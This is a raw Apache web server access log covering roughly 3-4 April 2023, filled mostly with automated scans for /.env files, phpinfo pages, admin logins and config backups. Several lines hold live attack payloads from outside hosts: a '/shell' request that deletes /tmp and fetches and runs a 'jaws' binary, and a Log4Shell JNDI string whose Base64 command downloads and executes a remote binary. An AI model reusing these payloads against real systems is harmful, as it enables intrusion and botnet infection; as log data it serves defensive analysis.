43.154.128.189 - - [03/Apr/2023:13:44:58 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
80.73.90.98 - - [03/Apr/2023:13:51:53 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
135.125.244.48 - - [03/Apr/2023:13:53:52 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:13:53:52 +0000] "POST / HTTP/1.1" 405 409717 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
218.29.54.69 - - [03/Apr/2023:14:09:08 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 100.43.163.61/jaws;sh+/tmp/jaws" 400 226 "-" "-"
45.128.232.149 - - [03/Apr/2023:14:16:28 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423604 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
73.158.24.105 - - [03/Apr/2023:14:17:59 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
130.211.82.238 - - [03/Apr/2023:14:36:45 +0000] "GET / HTTP/1.1" 200 8382 "-" "python-requests/2.28.2"
185.254.196.173 - - [03/Apr/2023:14:38:36 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:14:38:37 +0000] "POST / HTTP/1.1" 405 409720 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [03/Apr/2023:14:47:35 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
99.239.78.117 - - [03/Apr/2023:14:50:27 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
43.154.128.189 - - [03/Apr/2023:15:05:49 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:16:04:03 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:16:04:03 +0000] "POST / HTTP/1.1" 405 409733 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:16:08:41 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:16:08:42 +0000] "POST / HTTP/1.1" 405 409730 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.104.11.4 - - [03/Apr/2023:16:24:53 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [03/Apr/2023:16:25:29 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [03/Apr/2023:16:39:40 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.79.172.21 - - [03/Apr/2023:16:55:08 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.244.48 - - [03/Apr/2023:16:59:31 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:16:59:31 +0000] "POST / HTTP/1.1" 405 409727 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
::1 - - [03/Apr/2023:17:19:10 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
193.32.162.159 - - [03/Apr/2023:17:27:25 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [03/Apr/2023:17:44:15 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
95.214.55.244 - - [03/Apr/2023:18:06:31 +0000] "GET / HTTP/1.1" 200 41226 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvc2Rsc2RrayA7IGN1cmwgLU8gaHR0cDovLzEzNC42NS42Mi42NC8uY29uZmlnL3NkbHNka2sgOyBjaG1vZCAreCBzZGxzZGtrIDsgY2htb2QgNzc3IHNkbHNka2sgOyAuL3NkbHNka2sgMiA7IHN1ZG8gLi9zZGxzZGtrIDIgOyBybSAtcmYgc2Rsc2RrazsgY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkpOyBzdWRvIGN1cmwgaHR0cDovLzEyOS4xNTEuNjQuNTUvYXJjaC8kKHVuYW1lIC1tKS91c2VyLyQod2hvYW1pKQ==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//129.151.84.124:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvc2Rsc2RrayA7IGN1cmwgLU8gaHR0cDovLzEzNC42NS42Mi42NC8uY29uZmlnL3NkbHNka2sgOyBjaG1vZCAreCBzZGxzZGtrIDsgY2htb2QgNzc3IHNkbHNka2sgOyAuL3NkbHNka2sgMiA7IHN1ZG8gLi9zZGxzZGtrIDIgOyBybSAtcmYgc2Rsc2RrazsgY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkpOyBzdWRvIGN1cmwgaHR0cDovLzEyOS4xNTEuNjQuNTUvYXJjaC8kKHVuYW1lIC1tKS91c2VyLyQod2hvYW1pKQ==}')"
194.50.14.188 - - [03/Apr/2023:18:23:58 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
45.81.243.34 - - [03/Apr/2023:18:27:35 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
45.81.243.34 - - [03/Apr/2023:18:27:39 +0000] "POST /HNAP1/ HTTP/1.1" 301 235 "-" "Mozila/5.0"
135.125.244.48 - - [03/Apr/2023:18:28:21 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:18:28:22 +0000] "POST / HTTP/1.1" 405 409701 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
196.188.77.162 - - [03/Apr/2023:18:35:53 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
85.217.145.45 - - [03/Apr/2023:18:51:33 +0000] "GET / HTTP/1.1" 200 41226 "-" "Go-http-client/1.1"
186.193.60.189 - - [03/Apr/2023:18:51:50 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
43.154.128.189 - - [03/Apr/2023:19:02:37 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:19:08:10 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:19:08:13 +0000] "POST / HTTP/1.1" 405 409716 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:19:18:25 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:19:18:26 +0000] "POST / HTTP/1.1" 405 409729 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
159.65.111.248 - - [03/Apr/2023:19:39:00 +0000] "GET / HTTP/1.0" 200 41226 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0"
43.154.128.189 - - [03/Apr/2023:20:20:58 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:20:34:44 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:20:34:44 +0000] "POST / HTTP/1.1" 405 409730 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [03/Apr/2023:20:40:39 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.33.80.243 - - [03/Apr/2023:20:55:46 +0000] "\x16\x03\x01" 400 226 "-" "-"
205.210.31.16 - - [03/Apr/2023:20:58:20 +0000] "GET / HTTP/1.1" 200 41226 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
::1 - - [03/Apr/2023:21:01:38 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:21:01:41 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:21:01:42 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
3.88.172.96 - - [03/Apr/2023:21:11:16 +0000] "\x16\x03\x01" 400 226 "-" "-"
3.88.172.96 - - [03/Apr/2023:21:11:16 +0000] "\x16\x03\x01" 400 226 "-" "-"
3.88.172.96 - - [03/Apr/2023:21:11:16 +0000] "\x16\x03\x01" 400 226 "-" "-"
3.88.172.96 - - [03/Apr/2023:21:11:16 +0000] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
3.88.172.96 - - [03/Apr/2023:21:11:16 +0000] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
3.88.172.96 - - [03/Apr/2023:21:11:16 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
3.88.172.96 - - [03/Apr/2023:21:11:16 +0000] "GET /99vt HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
3.88.172.96 - - [03/Apr/2023:21:11:16 +0000] "GET /aaaaaaaaaaaaaaaaaaaaaaaaaqr HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
3.88.172.96 - - [03/Apr/2023:21:11:17 +0000] "GET /gate.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
3.88.172.96 - - [03/Apr/2023:21:11:17 +0000] "\x16\x03\x01" 400 226 "-" "-"
3.88.172.96 - - [03/Apr/2023:21:11:17 +0000] "\x16\x03\x01" 400 226 "-" "-"
3.88.172.96 - - [03/Apr/2023:21:11:17 +0000] "GET /99vu HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
::1 - - [03/Apr/2023:21:11:38 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
47.254.255.160 - - [03/Apr/2023:21:31:58 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
47.254.255.160 - - [03/Apr/2023:21:31:59 +0000] "POST / HTTP/1.1" 405 409731 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:21:47:41 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:21:47:41 +0000] "POST / HTTP/1.1" 405 409703 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:22:08:37 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:22:08:38 +0000] "POST / HTTP/1.1" 405 409700 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [03/Apr/2023:22:09:11 +0000] "GET / HTTP/1.1" 200 8387 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
::1 - - [03/Apr/2023:22:09:21 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:22 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:23 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:24 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:25 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:26 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:27 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:28 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:29 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:30 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:31 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:32 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:33 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:34 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [03/Apr/2023:22:09:35 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
128.14.134.170 - - [03/Apr/2023:22:14:07 +0000] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
198.235.24.3 - - [03/Apr/2023:22:14:55 +0000] "GET / HTTP/1.0" 200 41463 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
172.104.11.34 - - [03/Apr/2023:22:53:32 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [03/Apr/2023:22:57:11 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
66.240.236.109 - - [03/Apr/2023:22:58:25 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 zgrab/0.x"
163.47.174.114 - - [03/Apr/2023:23:08:35 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:23:27:56 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [03/Apr/2023:23:27:56 +0000] "POST / HTTP/1.1" 405 409713 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:23:34:55 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [03/Apr/2023:23:34:56 +0000] "POST / HTTP/1.1" 405 409710 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [04/Apr/2023:00:01:23 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [04/Apr/2023:00:15:14 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
45.131.111.87 - - [04/Apr/2023:00:26:43 +0000] "GET / HTTP/1.1" 200 8382 "http://13.244.159.169:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
167.94.138.51 - - [04/Apr/2023:00:35:17 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.51 - - [04/Apr/2023:00:35:27 +0000] "PRI * HTTP/2.0" 400 226 "-" "-"
167.94.138.51 - - [04/Apr/2023:00:35:28 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.51 - - [04/Apr/2023:00:35:28 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.51 - - [04/Apr/2023:00:35:29 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
135.125.244.48 - - [04/Apr/2023:00:35:51 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [04/Apr/2023:00:35:51 +0000] "POST / HTTP/1.1" 405 409759 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:01:07:38 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:01:07:42 +0000] "POST / HTTP/1.1" 405 409682 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [04/Apr/2023:01:33:22 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
193.32.162.159 - - [04/Apr/2023:01:36:58 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
135.125.244.48 - - [04/Apr/2023:01:47:48 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [04/Apr/2023:01:47:49 +0000] "POST / HTTP/1.1" 405 409735 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
195.178.120.44 - - [04/Apr/2023:02:13:06 +0000] "GET / HTTP/1.1" 200 8383 "http://13.244.159.169:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
205.210.31.48 - - [04/Apr/2023:02:28:04 +0000] "\x16\x03\x01" 400 226 "-" "-"
185.254.196.173 - - [04/Apr/2023:02:37:37 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [04/Apr/2023:02:37:40 +0000] "POST / HTTP/1.1" 405 409736 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.105.128.13 - - [04/Apr/2023:02:51:00 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [04/Apr/2023:02:51:29 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.244.48 - - [04/Apr/2023:02:55:32 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [04/Apr/2023:02:55:33 +0000] "POST / HTTP/1.1" 405 409741 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.8.22.79 - - [04/Apr/2023:03:21:23 +0000] "GET /.env HTTP/1.1" 200 - "-" "python-requests/2.28.2"
20.234.111.129 - - [04/Apr/2023:03:21:51 +0000] "GET /_profiler/phpinfo HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:03:21:52 +0000] "POST / HTTP/1.1" 405 408801 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:03:21:53 +0000] "POST /debug/default/view?panel=config HTTP/1.1" 405 413116 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:03:21:55 +0000] "POST /tool/view/phpinfo.view.php HTTP/1.1" 405 412353 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:03:21:56 +0000] "POST /wp-config.php-backup HTTP/1.1" 405 411997 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:03:21:57 +0000] "POST /%C0 HTTP/1.1" 404 1007 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.234.111.129 - - [04/Apr/2023:03:21:58 +0000] "POST /debug/default/view.html HTTP/1.1" 405 412167 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
